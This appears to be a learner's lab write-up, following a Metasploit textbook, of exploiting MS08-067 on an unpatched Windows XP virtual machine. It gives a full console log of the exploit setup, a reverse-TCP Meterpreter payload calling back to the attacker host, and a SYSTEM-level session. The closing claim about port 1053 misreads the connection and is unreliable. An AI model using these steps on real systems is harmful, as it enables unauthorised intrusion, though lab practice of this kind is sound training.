I’m targeting ports on the Windows portion of my Virtual Hacking Lab and following instructions given in Chapter 5 (The Joy of Exploitation) of Metasploit: The Penetration Tester’s Guide.
The exploitee system comprises: Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.
The object of this is for Metasploit to uncover open ports on the victim machine. My input is in bold:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3
msf exploit(ms08_067_netapi) > search ports
[!] Database not connected or cache not built, using slow searchMatching Modules
================Name Disclosure Date Rank Description
—- ————— —- ———–
auxiliary/admin/misc/wol normal UDP Wake-On-Lan (WOL)
auxiliary/admin/natpmp/natpmp_map normal NAT-PMP Port Mapper
auxiliary/admin/postgres/postgres_readfile normal PostgreSQL Server Generic Query
auxiliary/bnat/bnat_router normal BNAT Router
auxiliary/bnat/bnat_scan normal BNAT Scanner
auxiliary/scanner/http/apache_activemq_traversal normal Apache ActiveMQ Directory Traversal
auxiliary/scanner/http/vmware_server_dir_trav normal VMware Server Directory Traversal Vulnerability
auxiliary/scanner/http/wordpress_pingback_access normal WordPress Pingback Locator
auxiliary/scanner/misc/zenworks_preboot_fileaccess normal Novell ZENworks Configuration Management Preboot Service Remote File Access
auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal TCP Port Scanner
auxiliary/scanner/portscan/xmas normal TCP “XMas” Port Scanner
auxiliary/scanner/rservices/rexec_login normal rexec Authentication Scanner
auxiliary/scanner/rservices/rlogin_login normal rlogin Authentication Scanner
auxiliary/scanner/rservices/rsh_login normal rsh Authentication Scanner
auxiliary/scanner/scada/digi_realport_serialport_scan normal Digi RealPort Serial Server Port Scanner
auxiliary/scanner/snmp/snmp_enum normal SNMP Enumeration Module
auxiliary/scanner/vnc/vnc_login normal VNC Authentication Scanner
auxiliary/server/capture/mssql normal Authentication Capture: MSSQL
auxiliary/server/http_ntlmrelay normal HTTP Client MS Credential Relayer
exploit/linux/http/alcatel_omnipcx_mastercgi_exec 2007-09-09 manual Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution
exploit/multi/browser/java_rhino 2011-10-18 excellent Java Applet Rhino Script Engine Remote Code Execution
exploit/multi/misc/hp_vsa_exec 2011-11-11 excellent HP StorageWorks P4000 Virtual SAN Appliance Command Execution
exploit/multi/misc/java_rmi_server 2011-10-15 excellent Java RMI Server Insecure Default Configuration Java Code Execution
exploit/windows/browser/adobe_flash_sps 2011-08-09 normal Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
exploit/windows/browser/crystal_reports_printcontrol 2010-12-14 normal Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow
exploit/windows/browser/ms10_018_ie_tabular_activex 2010-03-09 good Internet Explorer Tabular Data Control ActiveX Memory Corruption
exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec 2010-06-09 excellent Microsoft Help Center XSS and Command Execution
exploit/windows/browser/ms11_093_ole32 2011-12-13 normal MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution
exploit/windows/browser/ms12_004_midi 2012-01-10 normal MS12-004 midiOutPlayNextPolyEvent Heap Overflow
exploit/windows/browser/ms12_037_same_id 2012-06-12 normal MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption
exploit/windows/browser/tom_sawyer_tsgetx71ex552 2011-05-03 normal Tom Sawyer Software GET Extension Factory Remote Code Execution
exploit/windows/fileformat/openoffice_ole 2008-04-17 normal OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow
exploit/windows/fileformat/ursoft_w32dasm 2005-01-24 good URSoft W32Dasm Disassembler Function Buffer Overflow
exploit/windows/http/apache_mod_rewrite_ldap 2006-07-28 great Apache module mod_rewrite LDAP protocol Buffer Overflow
exploit/windows/http/ca_totaldefense_regeneratereports 2011-04-13 excellent CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection
exploit/windows/http/savant_31_overflow 2002-09-10 great Savant 3.1 Web Server Overflow
exploit/windows/misc/allmediaserver_bof 2012-07-04 normal ALLMediaServer 0.8 Buffer Overflow
exploit/windows/mssql/mssql_linkcrawler 2000-01-01 great Microsoft SQL Server Database Link Crawling Command Execution
exploit/windows/mssql/mssql_payload_sqli 2000-05-30 excellent Microsoft SQL Server Payload Execution via SQL Injection
exploit/windows/novell/zenworks_preboot_op4c_bof 2012-02-22 normal Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow
exploit/windows/novell/zenworks_preboot_op6c_bof 2012-02-22 normal Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow
exploit/windows/scada/scadapro_cmdexe 2011-09-16 excellent Measuresoft ScadaPro <= 4.0.0 Remote Command Execution
exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual Microsoft Workstation Service NetpManageIPCConnect Overflow
payload/windows/dllinject/reverse_tcp_allports normal Reflective DLL Injection, Reverse All-Port TCP Stager
payload/windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
payload/windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
payload/windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
payload/windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
payload/windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
payload/windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
post/linux/gather/checkvm normal Linux Gather Virtual Environment Detection
post/linux/gather/enum_network normal Linux Gather Network Information
post/solaris/gather/checkvm normal Solaris Gather Virtual Environment Detection
post/windows/gather/checkvm normal Windows Gather Virtual Environment Detection
post/windows/manage/clone_proxy_settings normal Windows Manage Proxy Setting Clonermsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp_allports
PAYLOAD => windows/meterpreter/reverse_tcp_allports
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.[*] Started reverse handler on 192.168.1.70:1
msf exploit(ms08_067_netapi) > [*] Attempting to trigger the vulnerability…
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:1 -> 192.168.1.79:1053) at 2013-06-06 10:09:59 +0100msf exploit(ms08_067_netapi) > sessions -1 -v
Active sessions
===============Id Type Information Connection Via
– —- ———– ———- —
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ LAB 192.168.1.70:1 -> 192.168.1.79:1053 (192.168.1.79) exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1…meterpreter >
This line:
[*] Meterpreter session 1 opened (192.168.1.70:1 -> 192.168.1.79:1053) at 2013-06-06 10:09:59 +0100
Shows me that my attacking machine is using port 1053 on the victim machine.